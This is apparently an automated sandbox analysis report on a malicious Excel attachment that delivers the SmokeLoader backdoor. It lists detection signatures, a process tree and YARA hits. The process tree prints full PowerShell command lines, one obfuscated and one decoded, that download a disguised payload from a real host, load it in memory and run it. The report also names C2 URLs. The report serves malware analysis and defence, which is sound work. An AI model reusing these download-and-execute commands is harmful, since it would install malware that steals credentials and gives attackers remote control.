
Windows Analysis Report
40830001.xls

Overview

General Information

Sample name: 40830001.xls (renamed because original name is a hash value)
Original sample name: TO _SC13060P-CS_19 6 PO()POTWN#P20240830001.xls
Analysis ID: 1502223
MD5: a230c030160d04f7fa28fa4d48d71584
SHA1: 802288792e4b687e1f7f9cfb48086bc28e0152e3
SHA256: cb92d320fc9bc674e8d37ceeebf0363f8e96dd67ef4ef543b3348f96ef567e5f
Tags: xls

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3416 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3692 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3996 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 4052 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 2984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? 
? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? 
? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? 
? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? 
? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?EY? ? ? ? ?RQBX? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?5? ? ? ? ?C8? ? ? ? ?Ng? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?O? ? ? ? ?? ? ? ? ?0? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dk? ? ? ? ?Lg? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 1976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 2852 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3244 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3340 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 1256 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3164 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3216 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3348 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 2236 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • taskeng.exe (PID: 424 cmdline: taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • dagifhd (PID: 1216 cmdline: C:\Users\user\AppData\Roaming\dagifhd MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution:
  • SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1479:$obj2: \objdata
  • 0x1461:$obj3: \objupdate
  • 0x143d:$obj4: \objemb

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1479:$obj2: \objdata
  • 0x1461:$obj3: \objupdate
  • 0x143d:$obj4: \objemb
Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp
Rule: JoeSecurity_SmokeLoader_2
Description: Yara detected SmokeLoader
Author: Joe Security

Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Smokeloader_4e31426e
Description: unknown
Author: unknown
Strings:
  • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_SmokeLoader_2
Description: Yara detected SmokeLoader
Author: Joe Security

Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp
